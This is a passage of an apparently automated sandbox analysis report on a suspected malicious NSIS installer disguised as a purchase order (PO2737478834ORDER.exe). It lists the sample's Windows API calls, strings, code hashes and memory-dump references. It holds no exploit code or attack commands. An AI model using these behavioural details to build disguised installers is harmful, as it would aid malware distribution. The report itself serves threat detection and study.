                                                        • Snapshot File: hcaresult_0_2_400000_PO2737478834ORDER.jbxd
                                                        Similarity
                                                        • API ID: Char$Next$Prev
                                                        • String ID: "C:\Users\user\Desktop\PO2737478834ORDER.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                        • API String ID: 589700163-1611318795
                                                        • Opcode ID: 6d9cd5a565d063f7c871d931481108c2ccc59b6be6080685bd61ccbc84ff8956
                                                        • Instruction ID: d9f0ee3981b821fe41e3526cabf2d3b5ed91aab2121061eeaaee8554b2496e7d
                                                        • Opcode Fuzzy Hash: 6d9cd5a565d063f7c871d931481108c2ccc59b6be6080685bd61ccbc84ff8956
                                                        • Instruction Fuzzy Hash: 161108518047A129FB3206384C44B777FD84F97760F1A507BE9C2722C2D67C5CA68BAD
                                                        APIs
                                                        • GetWindowLongA.USER32(?,000000EB), ref: 004041C9
                                                        • GetSysColor.USER32(00000000), ref: 00404207
                                                        • SetTextColor.GDI32(?,00000000), ref: 00404213
                                                        • SetBkMode.GDI32(?,?), ref: 0040421F
                                                        • GetSysColor.USER32(?), ref: 00404232
                                                        • SetBkColor.GDI32(?,?), ref: 00404242
                                                        • DeleteObject.GDI32(?), ref: 0040425C
                                                        • CreateBrushIndirect.GDI32(?), ref: 00404266
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1267094890.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1267026802.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267148028.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267872417.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267872417.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267872417.0000000000445000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_PO2737478834ORDER.jbxd
                                                        Similarity
                                                        • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                        • String ID:
                                                        • API String ID: 2320649405-0
                                                        • Opcode ID: dc1d3e55db8ec23378b3830e5d111dcc895b5f12cd74b581ce4b7be4d8059b2f
                                                        • Instruction ID: aaf6f474a4af46f2497c0aff4df426b114d26e681d2b1e7af029b8f8d9950092
                                                        • Opcode Fuzzy Hash: dc1d3e55db8ec23378b3830e5d111dcc895b5f12cd74b581ce4b7be4d8059b2f
                                                        • Instruction Fuzzy Hash: 422162B16007049BCB20DF78D908F5BBBF8AF81754B048A6EF992A22E1D734E944CB54
                                                        APIs
                                                        • GetCurrentProcess.KERNEL32(?,?,00000000,?,?,?,700D10DC), ref: 700D17CC
                                                        • GetModuleHandleA.KERNEL32(KERNEL32,?,?,00000000,?,?,?,700D10DC), ref: 700D17DA
                                                        • GetProcAddress.KERNEL32(00000000,?), ref: 700D17F9
                                                        • GetProcAddress.KERNEL32(00000000,?), ref: 700D1822
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1269455905.00000000700D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 700D0000, based on PE: true
                                                        • Associated: 00000000.00000002.1269440399.00000000700D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000000.00000002.1269485100.00000000700D2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000000.00000002.1269504555.00000000700D3000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000000.00000002.1269540924.00000000700D4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_700d0000_PO2737478834ORDER.jbxd
                                                        Similarity
                                                        • API ID: AddressProc$CurrentHandleModuleProcess
                                                        • String ID: IsWow64Process2$KERNEL32
                                                        • API String ID: 977827838-1019154776
                                                        • Opcode ID: ed7ee2155aa4c401d53bd609d701518dade4dca659c882c120861293d8bea0d2
                                                        • Instruction ID: 640c6d1b5dd4fcea87e5b1d024c950261502f4be0a1c1f1c689565ef6ea2e0c0
                                                        • Opcode Fuzzy Hash: ed7ee2155aa4c401d53bd609d701518dade4dca659c882c120861293d8bea0d2
                                                        • Instruction Fuzzy Hash: 78014072E0020ABADB01EBF5CC45AEFBBBDDF05560F004065A912E2241EF74D905D770
                                                        APIs
                                                        • SendMessageA.USER32(?,0000110A,00000009,00000000), ref: 00404AB3
                                                        • GetMessagePos.USER32 ref: 00404ABB
                                                        • ScreenToClient.USER32(?,?), ref: 00404AD5
                                                        • SendMessageA.USER32(?,00001111,00000000,?), ref: 00404AE7
                                                        • SendMessageA.USER32(?,0000110C,00000000,?), ref: 00404B0D
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1267094890.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1267026802.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267148028.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267872417.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267872417.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267872417.0000000000445000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_PO2737478834ORDER.jbxd
                                                        Similarity
                                                        • API ID: Message$Send$ClientScreen
                                                        • String ID: f
                                                        • API String ID: 41195575-1993550816
                                                        • Opcode ID: fae6ee4ef260730fd0e6baeb46c05ac4d0d99299cd6b7910a3b5b88b2e21feb9
                                                        • Instruction ID: c5e689f19116b5cd7588311b3231e42886eb7a503382143ef86565be6c6ceac4
                                                        • Opcode Fuzzy Hash: fae6ee4ef260730fd0e6baeb46c05ac4d0d99299cd6b7910a3b5b88b2e21feb9
                                                        • Instruction Fuzzy Hash: 98015E71A40219BADB00DBA4DD85BFFBBBCAF59711F10016BBB40B61D0C7B499458BA8
                                                        APIs
                                                        • GetDC.USER32(?), ref: 00401E38
                                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E52
                                                        • MulDiv.KERNEL32(00000000,00000000), ref: 00401E5A
                                                        • ReleaseDC.USER32(?,00000000), ref: 00401E6B
                                                        • CreateFontIndirectA.GDI32(0040B808), ref: 00401EBA
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1267094890.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1267026802.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267148028.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267872417.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267872417.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267872417.0000000000445000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_PO2737478834ORDER.jbxd
                                                        Similarity
                                                        • API ID: CapsCreateDeviceFontIndirectRelease
                                                        • String ID: Calibri
                                                        • API String ID: 3808545654-1409258342
                                                        • Opcode ID: fc9f16b01a24cae65528eb59c91fd2b9324a8e2726ec0d721fc5ceb8334f1a1e
                                                        • Instruction ID: 57a26ad33cd6426129b0cba3998c620b955dd558a32440fd51a8b23e498893f8
                                                        • Opcode Fuzzy Hash: fc9f16b01a24cae65528eb59c91fd2b9324a8e2726ec0d721fc5ceb8334f1a1e
                                                        • Instruction Fuzzy Hash: 3E019672500240AFE7007BB0AE4A7997FF8D755301F108839F241B62F2C67800458BAC
                                                        APIs
                                                        • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402DD5
                                                        • MulDiv.KERNEL32(0007169E,00000064,?), ref: 00402E00
                                                        • wsprintfA.USER32 ref: 00402E10
                                                        • SetWindowTextA.USER32(?,?), ref: 00402E20
                                                        • SetDlgItemTextA.USER32(?,00000406,?), ref: 00402E32
                                                        Strings
                                                        • verifying installer: %d%%, xrefs: 00402E0A
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1267094890.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1267026802.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267148028.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267872417.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267872417.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267872417.0000000000445000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_PO2737478834ORDER.jbxd
                                                        Similarity
                                                        • API ID: Text$ItemTimerWindowwsprintf
                                                        • String ID: verifying installer: %d%%
                                                        • API String ID: 1451636040-82062127
                                                        • Opcode ID: c12f5796f431ffac12d06fef0705727a44af994ad502cf00351caa1c45e3c2e6
                                                        • Instruction ID: 483ea5b0a2f0e0c8b194c47557f81135a9cf1dc15d145a61dc19a9cae62ee66c
                                                        • Opcode Fuzzy Hash: c12f5796f431ffac12d06fef0705727a44af994ad502cf00351caa1c45e3c2e6
                                                        • Instruction Fuzzy Hash: CD014F70640209BBEF10AF60DE09EEE37A9AB04305F008039FA06A51D0DBB499559B59
                                                        APIs
                                                        • lstrlenA.KERNEL32(Ramplor Setup: Installing,Ramplor Setup: Installing,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,004048A9,000000DF,00000000,00000400,?), ref: 00404A2C
                                                        • wsprintfA.USER32 ref: 00404A34
                                                        • SetDlgItemTextA.USER32(?,Ramplor Setup: Installing), ref: 00404A47
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1267094890.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1267026802.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267148028.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267872417.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267872417.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267872417.0000000000445000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_PO2737478834ORDER.jbxd
                                                        Similarity
                                                        • API ID: ItemTextlstrlenwsprintf
                                                        • String ID: %u.%u%s%s$Ramplor Setup: Installing
                                                        • API String ID: 3540041739-2967741206
                                                        • Opcode ID: e7c66190fb260b440250c96ec47e9d60e1422182a5b9567c4571bd7753034b60
                                                        • Instruction ID: 1301199a10d6bfa0f795ae51e8cceb2c664c9f74d195b05cdaf9af1bfefcf64c
                                                        • Opcode Fuzzy Hash: e7c66190fb260b440250c96ec47e9d60e1422182a5b9567c4571bd7753034b60
                                                        • Instruction Fuzzy Hash: 7A11B7B36041286BEB0066799C46EAF32D9DB85374F250237FA26F61D1E9788C5281A9
                                                        APIs
                                                        • RegEnumValueA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,00100020,?,?,?), ref: 00402D24
                                                        • RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402D70
                                                        • RegCloseKey.ADVAPI32(?,?,?), ref: 00402D79
                                                        • RegDeleteKeyA.ADVAPI32(?,?), ref: 00402D90
                                                        • RegCloseKey.ADVAPI32(?,?,?), ref: 00402D9B
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1267094890.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1267026802.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267148028.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267872417.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267872417.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267872417.0000000000445000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_PO2737478834ORDER.jbxd
                                                        Similarity
                                                        • API ID: CloseEnum$DeleteValue
                                                        • String ID:
                                                        • API String ID: 1354259210-0
                                                        • Opcode ID: c08e85f7896b9a4561d683b23b3b2dae21a167d845191f4bc040fadce0444681
                                                        • Instruction ID: 479b5507277e1ed98100a043d195c8e3d67278c142fcba22c9f5c581f71d1c0c
                                                        • Opcode Fuzzy Hash: c08e85f7896b9a4561d683b23b3b2dae21a167d845191f4bc040fadce0444681
                                                        • Instruction Fuzzy Hash: DE215771900108BBEF129F90CE89EEE7A7DEF44344F100076FA55B11A0E7B48E94AA68
                                                        APIs
                                                        • GetDlgItem.USER32(?,?), ref: 00401D7E
                                                        • GetClientRect.USER32(?,?), ref: 00401DCC
                                                        • LoadImageA.USER32(?,?,?,?,?,?), ref: 00401DFC
                                                        • SendMessageA.USER32(?,00000172,?,00000000), ref: 00401E10
                                                        • DeleteObject.GDI32(00000000), ref: 00401E20
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1267094890.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1267026802.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267148028.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267872417.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267872417.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267872417.0000000000445000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_PO2737478834ORDER.jbxd
                                                        Similarity
                                                        • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                        • String ID:
                                                        • API String ID: 1849352358-0
                                                        • Opcode ID: 92fb06419dcf22d7c561d1c1cd7314035e184999ef60ddcb5701d42bd4b0d5ab
                                                        • Instruction ID: 377f1368a79285744d6b6cf0b5e74a57d9b5ac4df0fb29ad0ac025f91be5ae75
                                                        • Opcode Fuzzy Hash: 92fb06419dcf22d7c561d1c1cd7314035e184999ef60ddcb5701d42bd4b0d5ab
                                                        • Instruction Fuzzy Hash: C8212872A00109AFCF15DFA4DD85AAEBBB5EB88300F24417EF911F62A1CB389941DB54
                                                        APIs
                                                        • lstrlenA.KERNEL32(?,00000002,00000000,774E2D70,?,?,?,?,700D147C,00000002,?), ref: 700D185A
                                                        • OemToCharBuffA.USER32(?,?,00000000), ref: 700D1863
                                                        • SendMessageA.USER32(00001004,00000000,00000000,00000002), ref: 700D187C
                                                        • SendMessageA.USER32(00001007,00000000,?), ref: 700D18A1
                                                        • SendMessageA.USER32(00001013,?,00000000), ref: 700D18B2
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1269455905.00000000700D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 700D0000, based on PE: true
                                                        • Associated: 00000000.00000002.1269440399.00000000700D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000000.00000002.1269485100.00000000700D2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000000.00000002.1269504555.00000000700D3000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000000.00000002.1269540924.00000000700D4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_700d0000_PO2737478834ORDER.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$BuffCharlstrlen
                                                        • String ID:
                                                        • API String ID: 2682914888-0
                                                        • Opcode ID: 519fbb04830cf84feef6dd9045fef7c8d093c17d1f4ffeb14ca337d26fd3adaa
                                                        • Instruction ID: 864e3bef2c6ad8fd4772c8f5babe4dd561d1b5d1cbf8eb932fe2adf6f66cf7d6
                                                        • Opcode Fuzzy Hash: 519fbb04830cf84feef6dd9045fef7c8d093c17d1f4ffeb14ca337d26fd3adaa
                                                        • Instruction Fuzzy Hash: 94011AB2800208BEEB129FA6CD44EDEBFBDFB8C765F204116EA41A1261C7755944DBB0
                                                        APIs
                                                        • SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C9E
                                                        • SendMessageA.USER32(00000000,00000000,?,?), ref: 00401CB6
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1267094890.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1267026802.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267148028.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267872417.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267872417.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267872417.0000000000445000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_PO2737478834ORDER.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$Timeout
                                                        • String ID: !
                                                        • API String ID: 1777923405-2657877971
                                                        • Opcode ID: 7b70566c870daa96221156bf416f9a378a332c342d8049e94ba7da889c6dd66f
                                                        • Instruction ID: 51da54adcba92585663a26c7e1368d4a3271239daaedb1c2ef7502cbfef702b9
                                                        • Opcode Fuzzy Hash: 7b70566c870daa96221156bf416f9a378a332c342d8049e94ba7da889c6dd66f
                                                        • Instruction Fuzzy Hash: 05216071A44208BEEB059FB5D98AAAD7FB4EF44304F20447FF502B61D1D6B88541DB28
                                                        APIs
                                                          • Part of subcall function 004060C1: lstrcpynA.KERNEL32(?,?,00000400,004033E4,00423F20,NSIS Error,?,00000007,00000009,0000000B), ref: 004060CE
                                                          • Part of subcall function 00405AF2: CharNextA.USER32(?,?,C:\Users\user\AppData\Local\Temp\nsxE304.tmp,?,00405B5E,C:\Users\user\AppData\Local\Temp\nsxE304.tmp,C:\Users\user\AppData\Local\Temp\nsxE304.tmp,774D3410,?,C:\Users\user\AppData\Local\Temp\,004058A9,?,774D3410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405B00
                                                          • Part of subcall function 00405AF2: CharNextA.USER32(00000000), ref: 00405B05
                                                          • Part of subcall function 00405AF2: CharNextA.USER32(00000000), ref: 00405B19
                                                        • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsxE304.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsxE304.tmp,C:\Users\user\AppData\Local\Temp\nsxE304.tmp,774D3410,?,C:\Users\user\AppData\Local\Temp\,004058A9,?,774D3410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405B9A
                                                        • GetFileAttributesA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsxE304.tmp,C:\Users\user\AppData\Local\Temp\nsxE304.tmp,C:\Users\user\AppData\Local\Temp\nsxE304.tmp,C:\Users\user\AppData\Local\Temp\nsxE304.tmp,C:\Users\user\AppData\Local\Temp\nsxE304.tmp,C:\Users\user\AppData\Local\Temp\nsxE304.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsxE304.tmp,C:\Users\user\AppData\Local\Temp\nsxE304.tmp,774D3410,?,C:\Users\user\AppData\Local\Temp\,004058A9,?,774D3410,C:\Users\user\AppData\Local\Temp\), ref: 00405BAA
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1267094890.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1267026802.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267148028.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267872417.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267872417.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267872417.0000000000445000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_PO2737478834ORDER.jbxd
                                                        Similarity
                                                        • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                        • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\nsxE304.tmp
                                                        • API String ID: 3248276644-1832249804
                                                        • Opcode ID: 833d5d7d4d88ab044a5975486a6ace5c2f1c8b1622a9b4308b288e25f9abd96d
                                                        • Instruction ID: e51454695f06d4bf62575f1f71cc8d9d2da662beaff56aa2e5751c7b88ff0260
                                                        • Opcode Fuzzy Hash: 833d5d7d4d88ab044a5975486a6ace5c2f1c8b1622a9b4308b288e25f9abd96d
                                                        • Instruction Fuzzy Hash: 47F02835601E6029C622223A0C45BAF3A65CE8232474D013FFC51B52C2DB3CB943DE6E
                                                        APIs
                                                        • lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,004032FF,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403524,?,00000007,00000009,0000000B), ref: 00405A5F
                                                        • CharPrevA.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,004032FF,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403524,?,00000007,00000009,0000000B), ref: 00405A68
                                                        • lstrcatA.KERNEL32(?,0040A014,?,00000007,00000009,0000000B), ref: 00405A79
                                                        Strings
                                                        • C:\Users\user\AppData\Local\Temp\, xrefs: 00405A59
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1267094890.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1267026802.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267148028.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
